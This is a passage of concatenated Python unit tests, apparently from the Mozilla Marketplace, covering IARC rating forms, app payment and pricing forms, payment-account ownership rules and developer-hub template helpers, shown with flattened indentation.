data.update(kwargs)
return forms.IARCGetAppInfoForm(data=data, app=app or self.app)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_good(self, storefront_mock):
with self.assertRaises(IARCInfo.DoesNotExist):
self.app.iarc_info
form = self._get_form()
assert form.is_valid(), form.errors
form.save()
iarc_info = IARCInfo.objects.get(addon=self.app)
eq_(iarc_info.submission_id, 1)
eq_(iarc_info.security_code, 'a')
assert storefront_mock.called
@mock.patch.object(settings, 'IARC_ALLOW_CERT_REUSE', False)
def test_iarc_cert_reuse_on_self(self):
# Test okay to use on self.
self.app.set_iarc_info(1, 'a')
form = self._get_form()
ok_(form.is_valid())
form.save()
eq_(IARCInfo.objects.count(), 1)
@mock.patch.object(settings, 'IARC_ALLOW_CERT_REUSE', False)
def test_iarc_cert_already_used(self):
# Test okay to use on self.
self.app.set_iarc_info(1, 'a')
eq_(IARCInfo.objects.count(), 1)
some_app = amo.tests.app_factory()
form = self._get_form(app=some_app)
ok_(not form.is_valid())
form = self._get_form(app=some_app, submission_id=2)
ok_(form.is_valid())
@mock.patch.object(settings, 'IARC_ALLOW_CERT_REUSE', True)
def test_iarc_already_used_dev(self):
self.app.set_iarc_info(1, 'a')
form = self._get_form()
ok_(form.is_valid())
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_changing_cert(self, storefront_mock):
self.app.set_iarc_info(1, 'a')
form = self._get_form(submission_id=2, security_code='b')
ok_(form.is_valid(), form.errors)
form.save()
iarc_info = self.app.iarc_info.reload()
eq_(iarc_info.submission_id, 2)
eq_(iarc_info.security_code, 'b')
assert storefront_mock.called
def test_iarc_unexclude(self):
geodata, created = Geodata.objects.get_or_create(addon=self.app)
geodata.update(region_br_iarc_exclude=True,
region_de_iarc_exclude=True)
form = self._get_form()
ok_(form.is_valid())
form.save()
geodata = Geodata.objects.get(addon=self.app)
assert not geodata.region_br_iarc_exclude
assert not geodata.region_de_iarc_exclude
def test_allow_subm(self):
form = self._get_form(submission_id='subm-1231')
assert form.is_valid(), form.errors
form.save()
iarc_info = self.app.iarc_info
eq_(iarc_info.submission_id, 1231)
eq_(iarc_info.security_code, 'a')
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_bad_submission_id(self, storefront_mock):
form = self._get_form(submission_id='subwayeatfresh-133')
assert not form.is_valid()
assert not storefront_mock.called
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_incomplete(self, storefront_mock):
form = self._get_form(submission_id=None)
assert not form.is_valid(), 'Form was expected to be invalid.'
assert not storefront_mock.called
@mock.patch('lib.iarc.utils.IARC_XML_Parser.parse_string')
def test_rating_not_found(self, _mock):
_mock.return_value = {'rows': [
{'ActionStatus': 'No records found. Please try another criteria.'}
]}
form = self._get_form()
assert form.is_valid(), form.errors
with self.assertRaises(django_forms.ValidationError):
form.save()
########NEW FILE########
__FILENAME__ = test_forms_payments
import mock
from curling.lib import HttpClientError
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import Addon, AddonDeviceType, AddonUser
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR)
from editors.models import RereviewQueue
from users.models import UserProfile
from mkt.developers import forms_payments, models
from mkt.developers.providers import get_provider
from mkt.developers.tests.test_providers import Patcher
from mkt.developers.tests.test_views_payments import setup_payment_account
from mkt.site.fixtures import fixture
from mkt.prices.models import AddonPremium, Price
class TestPremiumForm(amo.tests.TestCase):
# None of the tests in this TC should initiate Solitude calls.
fixtures = fixture('webapp_337141')
def setUp(self):
self.request = RequestFactory()
self.request.POST = {'toggle-paid': ''}
self.addon = Addon.objects.get(pk=337141)
AddonDeviceType.objects.create(
addon=self.addon, device_type=amo.DEVICE_GAIA.id)
self.platforms = {'free_platforms': ['free-firefoxos'],
'paid_platforms': ['paid-firefoxos']}
self.price = Price.objects.create(price='0.99')
self.user = UserProfile.objects.get(email='[email protected]')
self.kwargs = {
'request': self.request,
'addon': self.addon,
'user': self.user,
}
def test_free_to_premium(self):
self.request.POST = {'toggle-paid': 'paid'}
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.addon.premium_type, amo.ADDON_PREMIUM)
eq_(self.addon.status, amo.STATUS_NULL)
def test_free_to_premium_pending(self):
# Pending apps shouldn't get re-reviewed.
self.addon.update(status=amo.STATUS_PENDING)
self.request.POST = {'toggle-paid': 'paid'}
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(RereviewQueue.objects.count(), 0)
def test_free_with_in_app_requires_in_app(self):
self.platforms.update(price='free', allow_inapp='False')
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert not form.is_valid()
def test_free_with_in_app(self):
self.make_premium(self.addon)
self.platforms.update(price='free', allow_inapp='True')
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert form.is_valid()
form.save()
eq_(self.addon.premium_type, amo.ADDON_FREE_INAPP)
def test_tier_zero_inapp_is_optional(self):
self.platforms.update(price='free', allow_inapp='False')
price = Price.objects.create(price='9.99')
self.platforms.update(price=price.pk, allow_inapp='True')
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert form.is_valid()
self.platforms.update(price=price.pk, allow_inapp='False')
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert form.is_valid()
def test_premium_to_free(self):
# Premium to Free is ok for public apps.
self.make_premium(self.addon)
self.request.POST = {'toggle-paid': 'free'}
self.platforms.update(price=self.price.pk)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(RereviewQueue.objects.count(), 0)
eq_(self.addon.premium_type, amo.ADDON_FREE)
eq_(self.addon.status, amo.STATUS_PUBLIC)
def test_is_paid_premium(self):
self.make_premium(self.addon)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
eq_(form.is_paid(), True)
def test_free_inapp_price_required(self):
self.addon.update(premium_type=amo.ADDON_FREE_INAPP)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert not form.is_valid()
def test_is_paid_premium_inapp(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM_INAPP)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
eq_(form.is_paid(), True)
def test_is_paid_free_inapp(self):
self.addon.update(premium_type=amo.ADDON_FREE_INAPP)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
eq_(form.is_paid(), True)
def test_not_is_paid_free(self):
self.addon.update(premium_type=amo.ADDON_FREE)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
eq_(form.is_paid(), False)
def test_add_device(self):
self.addon.update(status=amo.STATUS_PENDING)
self.platforms['free_platforms'].append('free-desktop')
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
assert amo.DEVICE_DESKTOP in self.addon.device_types
eq_(RereviewQueue.objects.count(), 0)
eq_(self.addon.status, amo.STATUS_PENDING)
def test_add_device_public_rereview(self):
self.addon.update(status=amo.STATUS_PUBLIC)
self.platforms['free_platforms'].append('free-desktop')
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
assert amo.DEVICE_DESKTOP in self.addon.device_types
eq_(RereviewQueue.objects.count(), 1)
eq_(self.addon.status, amo.STATUS_PUBLIC)
def test_add_device_publicwaiting_rereview(self):
self.addon.update(status=amo.STATUS_PUBLIC_WAITING)
self.platforms['free_platforms'].append('free-desktop')
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
assert amo.DEVICE_DESKTOP in self.addon.device_types
eq_(RereviewQueue.objects.count(), 1)
eq_(self.addon.status, amo.STATUS_PUBLIC_WAITING)
def test_update(self):
self.make_premium(self.addon)
price = Price.objects.create(price='9.99')
self.platforms.update(price=price.pk)
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.addon.premium.price.pk, price.pk)
def test_update_wo_initial_price(self):
"""Test that if the app doesn't have an initial price (i.e.: it was
marked as paid during submission) that this is handled gracefully.
"""
# Don't give the app an initial price.
self.addon._premium = AddonPremium.objects.create(addon=self.addon)
self.addon.premium_type = amo.ADDON_PREMIUM
price = Price.objects.create(price='9.99')
self.platforms.update(price=price.pk)
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.addon.premium.price.pk, price.pk)
def test_update_new_with_acct(self):
# This was the situation for a new app that was getting linked to an
# existing bank account.
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.platforms.update(price=self.price.pk)
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
addon = Addon.objects.get(pk=self.addon.pk)
assert addon.premium
def test_update_with_bogus_price(self):
AddonPremium.objects.create(addon=self.addon)
self.addon.premium_type = amo.ADDON_PREMIUM
self.platforms.update(price='bogus')
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
eq_(form.is_valid(), False)
eq_(len(form.errors), 1)
ok_('price' in form.errors)
def test_premium_with_empty_price(self):
AddonPremium.objects.create(addon=self.addon)
self.addon.premium_type = amo.ADDON_PREMIUM
self.platforms.update(price='')
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
eq_(form.is_valid(), False)
eq_(len(form.errors), 1)
ok_('price' in form.errors)
def test_premium_with_price_does_not_exist(self):
AddonPremium.objects.create(addon=self.addon)
self.addon.premium_type = amo.ADDON_PREMIUM
self.platforms.update(price=9999)
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
form.fields['price'].choices = ((9999, 'foo'),)
eq_(form.is_valid(), False)
eq_(len(form.errors), 1)
ok_('price' in form.errors)
def test_optgroups_in_price_choices(self):
Price.objects.create(price='0.00', method=PAYMENT_METHOD_ALL)
Price.objects.create(price='0.10', method=PAYMENT_METHOD_OPERATOR)
Price.objects.create(price='1.00', method=PAYMENT_METHOD_CARD)
Price.objects.create(price='1.10', method=PAYMENT_METHOD_CARD)
Price.objects.create(price='1.00', method=PAYMENT_METHOD_ALL)
Price.objects.create(price='2.00', method=PAYMENT_METHOD_ALL)
form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
# 1 x Free with inapp
# + 1 x price tier 0
# + 3 x values grouped by billing
# = 5
eq_(len(form.fields['price'].choices), 5)
html = form.as_p()
eq_(len(pq(html)('#id_price optgroup')), 3, 'Should be 3 optgroups')
def test_cannot_change_devices_on_toggle(self):
self.request.POST = {'toggle-paid': 'paid'}
self.platforms = {'paid_platforms': ['paid-firefoxos']}
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.addon.premium_type, amo.ADDON_PREMIUM)
eq_(self.addon.status, amo.STATUS_NULL)
self.assertSetEqual(self.addon.device_types, form.get_devices())
def test_cannot_set_desktop_for_packaged_app(self):
self.platforms = {'free_platforms': ['free-desktop']}
self.addon.update(is_packaged=True)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert not form.is_valid()
def test_can_set_desktop_for_packaged_app(self):
self.create_flag('desktop-packaged')
self.platforms = {'free_platforms': ['free-desktop']}
self.addon.update(is_packaged=True)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
def test_can_change_devices_for_hosted_app(self):
# Specify the free and paid. It shouldn't fail because you can't change
# payment types without explicitly specifying that.
self.platforms = {'free_platforms': ['free-desktop'],
'paid_platforms': ['paid-firefoxos']} # Ignored.
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
self.assertSetEqual(self.addon.device_types, [amo.DEVICE_DESKTOP])
def test_cannot_change_android_devices_for_packaged_app(self):
self.platforms = {'free_platforms': ['free-android-mobile'],
'paid_platforms': ['paid-firefoxos']} # Ignored.
self.addon.update(is_packaged=True)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert not form.is_valid()
self.assertSetEqual(self.addon.device_types, [amo.DEVICE_GAIA])
def test_can_change_devices_for_packaged_app_behind_flag(self):
self.create_flag('android-packaged')
self.platforms = {'free_platforms': ['free-android-mobile'],
'paid_platforms': ['paid-firefoxos']} # Ignored.
self.addon.update(is_packaged=True)
form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
self.assertSetEqual(self.addon.device_types, [amo.DEVICE_MOBILE])
def test_can_change_devices_for_android_app_behind_flag(self):
self.create_flag('android-payments')
data = {'paid_platforms': ['paid-firefoxos', 'paid-android-mobile'],
'price': 'free', 'allow_inapp': 'True'}
self.make_premium(self.addon)
form = forms_payments.PremiumForm(data=data, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
self.assertSetEqual(self.addon.device_types, [amo.DEVICE_MOBILE,
amo.DEVICE_GAIA])
def test_initial(self):
form = forms_payments.PremiumForm(**self.kwargs)
eq_(form._initial_price_id(), Price.objects.get(price='0.99').pk)
def test_initial_not_there(self):
Price.objects.get(price='0.99').update(active=False)
form = forms_payments.PremiumForm(**self.kwargs)
eq_(form._initial_price_id(), None)
class TestAccountListForm(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'group_admin',
'user_admin', 'user_admin_group', 'prices')
def setUp(self):
super(TestAccountListForm, self).setUp()
self.addon = Addon.objects.get(pk=337141)
self.addon.update(status=amo.STATUS_NULL,
highest_status=amo.STATUS_PUBLIC)
self.provider = get_provider(name='bango')
self.price = Price.objects.filter()[0]
AddonPremium.objects.create(addon=self.addon, price=self.price)
self.user = UserProfile.objects.get(pk=31337)
amo.set_user(self.user)
self.other = UserProfile.objects.get(pk=999)
self.admin = UserProfile.objects.get(email='[email protected]')
self.kwargs = {
'addon': self.addon,
'provider': self.provider,
}
def create_user_account(self, user, **kwargs):
"""Create a user account"""
seller = models.SolitudeSeller.objects.create(
resource_uri='/path/to/sel', user=user, uuid='uuid-%s' % user.pk)
data = dict(user=user, uri='asdf-%s' % user.pk, name='test',
inactive=False, solitude_seller=seller,
seller_uri='suri-%s' % user.pk, account_id=123,
agreed_tos=True, shared=False)
data.update(**kwargs)
return models.PaymentAccount.objects.create(**data)
def make_owner(self, user):
AddonUser.objects.create(addon=self.addon,
user=user, role=amo.AUTHOR_ROLE_OWNER)
def is_owner(self, user):
return (self.addon.authors.filter(pk=user.pk,
addonuser__role=amo.AUTHOR_ROLE_OWNER).exists())
def associate_owner_account(self):
owner_account = self.create_user_account(self.user)
form = forms_payments.AccountListForm(
data={'accounts': owner_account.pk}, user=self.user, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
return owner_account
def test_with_owner_account(self):
user = self.user
account = self.create_user_account(user)
assert self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
eq_(form.current_payment_account, None)
assert form.is_valid(), form.errors
form.save()
form = forms_payments.AccountListForm(None, user=user,
**self.kwargs)
eq_(form.fields['accounts'].widget.attrs.get('disabled'), None)
eq_(form.fields['accounts'].empty_label, None)
eq_(form.initial['accounts'], account)
def test_with_shared_account(self):
account = self.create_user_account(self.user)
shared = self.create_user_account(self.other, shared=True)
form = forms_payments.AccountListForm(user=self.user,
**self.kwargs)
self.assertSetEqual(form.fields['accounts'].queryset,
(account, shared))
def test_set_shared_account(self):
shared = self.create_user_account(self.other, shared=True)
form = forms_payments.AccountListForm(
data={'accounts': shared.pk}, user=self.user, **self.kwargs)
assert form.is_valid()
form.save()
accts = set(a.payment_account.pk for a in
self.addon.all_payment_accounts())
assert shared.pk in accts, 'Unexpected: {a}'.format(a=accts)
def test_with_non_owner_account(self):
user = self.other
account = self.create_user_account(user)
assert not self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
eq_(form.current_payment_account, None)
assert form.fields['accounts'].widget.attrs['disabled'] is not None
assert not form.is_valid(), form.errors
def test_with_non_owner_admin_account(self):
user = self.admin
account = self.create_user_account(user)
assert not self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
eq_(form.current_payment_account, None)
assert form.fields['accounts'].widget.attrs['disabled'] is not None
assert not form.is_valid(), form.errors
def test_admin_account_no_data(self):
self.associate_owner_account()
user = self.admin
assert not self.is_owner(user)
form = forms_payments.AccountListForm(
data={}, user=user, **self.kwargs)
assert form.fields['accounts'].widget.attrs['disabled'] is not None
assert form.is_valid(), form.errors
def test_admin_account_empty_string(self):
self.associate_owner_account()
user = self.admin
assert not self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': ''}, user=user, **self.kwargs)
assert form.fields['accounts'].widget.attrs['disabled'] is not None
assert not form.is_valid(), form.errors
def test_with_other_owner_account(self):
user = self.other
account = self.create_user_account(user)
self.make_owner(user)
assert self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
assert form.is_valid(), form.errors
eq_(form.current_payment_account, None)
eq_(form.fields['accounts'].widget.attrs.get('disabled'), None)
form.save()
form = forms_payments.AccountListForm(None, user=user,
**self.kwargs)
eq_(form.fields['accounts'].empty_label, None)
eq_(form.initial['accounts'], account)
def test_with_non_owner_account_existing_account(self):
owner_account = self.associate_owner_account()
user = self.other
account = self.create_user_account(user)
assert not self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
assert form.fields['accounts'].widget.attrs['disabled'] is not None
eq_(form.current_payment_account, owner_account)
assert not form.is_valid(), form.errors
def test_with_non_owner_admin_account_existing_account(self):
owner_account = self.associate_owner_account()
user = self.admin
account = self.create_user_account(user)
assert not self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
assert form.fields['accounts'].widget.attrs['disabled'] is not None
eq_(form.current_payment_account, owner_account)
assert not form.is_valid(), form.errors
def test_with_other_owner_account_existing_account(self):
owner_account = self.associate_owner_account()
user = self.other
account = self.create_user_account(user)
self.make_owner(user)
assert self.is_owner(user)
form = forms_payments.AccountListForm(
data={'accounts': account.pk}, user=user, **self.kwargs)
eq_(form.current_payment_account, owner_account)
assert form.is_valid(), form.errors
form.save()
form = forms_payments.AccountListForm(None, user=user,
**self.kwargs)
eq_(form.fields['accounts'].empty_label, None)
eq_(form.initial['accounts'], account)
assert form.current_payment_account is None
class TestPaidRereview(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'prices')
def setUp(self):
super(TestPaidRereview, self).setUp()
self.addon = Addon.objects.get(pk=337141)
self.addon.update(status=amo.STATUS_NULL,
highest_status=amo.STATUS_PUBLIC)
self.provider = get_provider(name='bango')
self.price = Price.objects.filter()[0]
AddonPremium.objects.create(addon=self.addon, price=self.price)
self.user = UserProfile.objects.get(email='[email protected]')
amo.set_user(self.user)
seller = models.SolitudeSeller.objects.create(
resource_uri='/path/to/sel', user=self.user)
self.account = models.PaymentAccount.objects.create(
user=self.user, uri='asdf', name='test', inactive=False,
solitude_seller=seller, account_id=123, agreed_tos=True)
self.kwargs = {
'addon': self.addon,
'user': self.user,
'provider': self.provider,
}
@mock.patch('mkt.webapps.models.Webapp.is_fully_complete',
new=mock.MagicMock())
def test_rereview(self):
form = forms_payments.AccountListForm(
data={'accounts': self.account.pk}, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.addon.status, amo.STATUS_PUBLIC)
eq_(RereviewQueue.objects.count(), 1)
form = forms_payments.AccountListForm(None, **self.kwargs)
eq_(form.fields['accounts'].empty_label, None)
def test_disagreed_tos_rereview(self):
self.account.update(agreed_tos=False)
form = forms_payments.AccountListForm(
data={'accounts': self.account.pk}, **self.kwargs)
assert not form.is_valid()
eq_(form.errors['accounts'],
['Select a valid choice. That choice is not one of the available '
'choices.'])
@mock.patch('mkt.webapps.models.Webapp.is_fully_complete',
new=mock.MagicMock())
def test_norereview(self):
self.addon.update(highest_status=amo.STATUS_PENDING)
form = forms_payments.AccountListForm(
data={'accounts': self.account.pk}, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.addon.status, amo.STATUS_PENDING)
eq_(RereviewQueue.objects.count(), 0)
class TestRestoreAppStatus(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.addon = Addon.objects.get(pk=337141)
self.addon.status = amo.STATUS_NULL
def test_to_public(self):
self.addon.highest_status = amo.STATUS_PUBLIC
forms_payments._restore_app_status(self.addon)
eq_(self.addon.status, amo.STATUS_PUBLIC)
def test_to_null(self):
self.addon.highest_status = amo.STATUS_NULL
forms_payments._restore_app_status(self.addon)
# Apps without a highest status default to PENDING.
eq_(self.addon.status, amo.STATUS_PENDING)
class TestBangoAccountForm(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestBangoAccountForm, self).setUp()
self.app = Addon.objects.get(pk=337141)
self.user = self.app.addonuser_set.get().user
form = forms_payments.BangoPaymentAccountForm()
self.data = {}
for field in form.fields:
if 'currency' in field:
self.data[field] = 'USD'
elif 'Iso' in field:
self.data[field] = 'USA'
else:
self.data[field] = '[email protected]' # Good enough.
def test_bank_required(self):
"""When there is no account, require bank details."""
form = forms_payments.BangoPaymentAccountForm(self.data)
assert form.is_valid(), form.errors
del self.data['bankName']
form = forms_payments.BangoPaymentAccountForm(self.data)
assert not form.is_valid(), form.errors
def test_bank_not_required(self):
"""When an account is specified, don't require bank details."""
payment = setup_payment_account(self.app, self.user).payment_account
form = forms_payments.BangoPaymentAccountForm(
self.data, account=payment)
assert form.is_valid(), form.errors
del self.data['bankName']
form = forms_payments.BangoPaymentAccountForm(
self.data, account=payment)
assert form.is_valid(), form.errors # Still valid, even now.
def test_on_save(self):
"""Save should just trigger the account's update function."""
payment = setup_payment_account(self.app, self.user).payment_account
form = forms_payments.BangoPaymentAccountForm(
self.data, account=payment)
assert form.is_valid(), form.errors
form.cleaned_data = {'account_name': 'foo', 'name': 'bob'}
form.save()
payment = payment.reload()
eq_(payment.name, 'foo')
self.bango_patcher.api.by_url.assert_called_with('uid')
class TestBokuAccountForm(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestBokuAccountForm, self).setUp()
self.app = Addon.objects.get(pk=337141)
self.user = self.app.addonuser_set.get().user
@mock.patch('mkt.developers.forms_payments.client')
def test_valid_when_verified(self, client):
verify_service = client.api.boku.verify_service.post
verify_service.return_value = ''
form = forms_payments.BokuAccountForm({'account_name': 'Boku Acct',
'service_id': 'clearly-valid'})
ok_(form.is_valid())
verify_service.assert_called_with({'service_id': 'clearly-valid'})
@mock.patch('mkt.developers.forms_payments.client')
def test_invalid_when_not_verified(self, client):
verify_service = client.api.boku.verify_service.post
verify_service.side_effect = HttpClientError
form = forms_payments.BokuAccountForm({'account_name': 'Boku Acct',
'service_id': 'not-valid'})
ok_(not form.is_valid())
eq_(len(form.errors['service_id']), 1)
verify_service.assert_called_with({'service_id': 'not-valid'})
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import unittest
import urllib
from django.core.urlresolvers import reverse
from django.utils import translation
from mock import Mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from addons.models import Addon
from amo.tests.test_helpers import render
from files.models import File, Platform
from mkt.developers import helpers
from users.models import UserProfile
from versions.models import Version
def test_hub_page_title():
translation.activate('en-US')
request = Mock()
request.APP = None
addon = Mock()
addon.name = 'name'
ctx = {'request': request, 'addon': addon}
title = 'Oh hai!'
s1 = render('{{ hub_page_title("%s") }}' % title, ctx)
s2 = render('{{ mkt_page_title("%s | Developers") }}' % title, ctx)
eq_(s1, s2)
s1 = render('{{ hub_page_title() }}', ctx)
s2 = render('{{ mkt_page_title("Developers") }}', ctx)
eq_(s1, s2)
s1 = render('{{ hub_page_title("%s", addon) }}' % title, ctx)
s2 = render('{{ mkt_page_title("%s | %s") }}' % (title, addon.name), ctx)
eq_(s1, s2)
class TestNewDevBreadcrumbs(amo.tests.TestCase):
def setUp(self):
self.request = Mock()
self.request.APP = None
def test_no_args(self):
s = render('{{ hub_breadcrumbs() }}', {'request': self.request})
eq_(s, '')
def test_with_items(self):
s = render("""{{ hub_breadcrumbs(items=[('/foo', 'foo'),
('/bar', 'bar')]) }}'""",
{'request': self.request})
crumbs = pq(s)('li')
expected = [
('Home', reverse('home')),
('Developers', reverse('ecosystem.landing')),
('foo', '/foo'),
('bar', '/bar'),
]
amo.tests.check_links(expected, crumbs, verify=False)
def test_with_app(self):
product = Mock()
product.name = 'Steamcube'
product.id = 9999
product.app_slug = 'scube'
product.type = amo.ADDON_WEBAPP
s = render("""{{ hub_breadcrumbs(product) }}""",
{'request': self.request, 'product': product})
crumbs = pq(s)('li')
expected = [
('Home', reverse('home')),
('Developers', reverse('ecosystem.landing')),
('My Submissions', reverse('mkt.developers.apps')),
('Steamcube', None),
]
amo.tests.check_links(expected, crumbs, verify=False)
def test_with_app_and_items(self):
product = Mock()
product.name = 'Steamcube'
product.id = 9999
product.app_slug = 'scube'
product.type = amo.ADDON_WEBAPP
product.get_dev_url.return_value = reverse('mkt.developers.apps.edit',
args=[product.app_slug])
s = render("""{{ hub_breadcrumbs(product,
items=[('/foo', 'foo'),
('/bar', 'bar')]) }}""",
{'request': self.request, 'product': product})
crumbs = pq(s)('li')
expected = [
('Home', reverse('home')),
('Developers', reverse('ecosystem.landing')),
('My Submissions', reverse('mkt.developers.apps')),
('Steamcube', product.get_dev_url()),
('foo', '/foo'),
('bar', '/bar'),
]
amo.tests.check_links(expected, crumbs, verify=False)
def test_summarize_validation():
v = Mock()
v.errors = 1
v.warnings = 1
eq_(render('{{ summarize_validation(validation) }}',
{'validation': v}),
u'1 error, 1 warning')
v.errors = 2
eq_(render('{{ summarize_validation(validation) }}',
{'validation': v}),
u'2 errors, 1 warning')
v.warnings = 2
eq_(render('{{ summarize_validation(validation) }}',
{'validation': v}),
u'2 errors, 2 warnings')
def test_log_action_class():
v = Mock()
for k, v in amo.LOG_BY_ID.iteritems():
if v.action_class is not None:
cls = 'action-' + v.action_class
else:
cls = ''
eq_(render('{{ log_action_class(id) }}', {'id': v.id}), cls)
class TestDisplayUrl(unittest.TestCase):
def setUp(self):
self.raw_url = u'http://host/%s' % 'フォクすけといっしょ'.decode('utf8')
def test_utf8(self):
url = urllib.quote(self.raw_url.encode('utf8'))
eq_(render('{{ url|display_url }}', {'url': url}),
self.raw_url)
def test_unicode(self):
url = urllib.quote(self.raw_url.encode('utf8'))
url = unicode(url, 'utf8')
eq_(render('{{ url|display_url }}', {'url': url}),
self.raw_url)
def test_euc_jp(self):
url = urllib.quote(self.raw_url.encode('euc_jp'))
eq_(render('{{ url|display_url }}', {'url': url}),
self.raw_url)
class TestDevFilesStatus(amo.tests.TestCase):
def setUp(self):
platform = Platform.objects.create(id=amo.PLATFORM_ALL.id)
self.addon = Addon.objects.create(type=1, status=amo.STATUS_UNREVIEWED)
self.version = Version.objects.create(addon=self.addon)
self.file = File.objects.create(version=self.version,
platform=platform,
status=amo.STATUS_UNREVIEWED)
def expect(self, expected):
cnt, msg = helpers.dev_files_status([self.file], self.addon)[0]
eq_(cnt, 1)
eq_(msg, expected)
def test_unreviewed_lite(self):
self.addon.status = amo.STATUS_LITE
self.file.status = amo.STATUS_UNREVIEWED
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_UNREVIEWED])
def test_unreviewed_public(self):
self.addon.status = amo.STATUS_PUBLIC
self.file.status = amo.STATUS_UNREVIEWED
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_NOMINATED])
def test_unreviewed_nominated(self):
self.addon.status = amo.STATUS_NOMINATED
self.file.status = amo.STATUS_UNREVIEWED
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_NOMINATED])
def test_unreviewed_lite_and_nominated(self):
self.addon.status = amo.STATUS_LITE_AND_NOMINATED
self.file.status = amo.STATUS_UNREVIEWED
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_NOMINATED])
def test_reviewed_lite(self):
self.addon.status = amo.STATUS_LITE
self.file.status = amo.STATUS_LITE
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_LITE])
def test_reviewed_public(self):
self.addon.status = amo.STATUS_PUBLIC
self.file.status = amo.STATUS_PUBLIC
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_PUBLIC])
def test_disabled(self):
self.addon.status = amo.STATUS_PUBLIC
self.file.status = amo.STATUS_DISABLED
self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_DISABLED])
class TestDevAgreement(amo.tests.TestCase):
def setUp(self):
self.user = UserProfile()
def test_none(self):
with self.settings(DEV_AGREEMENT_LAST_UPDATED=None):
eq_(helpers.dev_agreement_ok(self.user), True)
def test_date_oops(self):
with self.settings(DEV_AGREEMENT_LAST_UPDATED=('wat?')):
eq_(helpers.dev_agreement_ok(self.user), True)
def test_not_agreed(self):
# The user has never agreed to it so in this case we don't need to
# worry them about changes.
self.user.update(read_dev_agreement=None)
with self.settings(DEV_AGREEMENT_LAST_UPDATED=
self.days_ago(10).date()):
eq_(helpers.dev_agreement_ok(self.user), True)
def test_past_agreed(self):
self.user.update(read_dev_agreement=self.days_ago(10))
with self.settings(DEV_AGREEMENT_LAST_UPDATED=self.days_ago(5).date()):
eq_(helpers.dev_agreement_ok(self.user), False)
def test_not_past(self):
self.user.update(read_dev_agreement=self.days_ago(5))
with self.settings(DEV_AGREEMENT_LAST_UPDATED=
self.days_ago(10).date()):
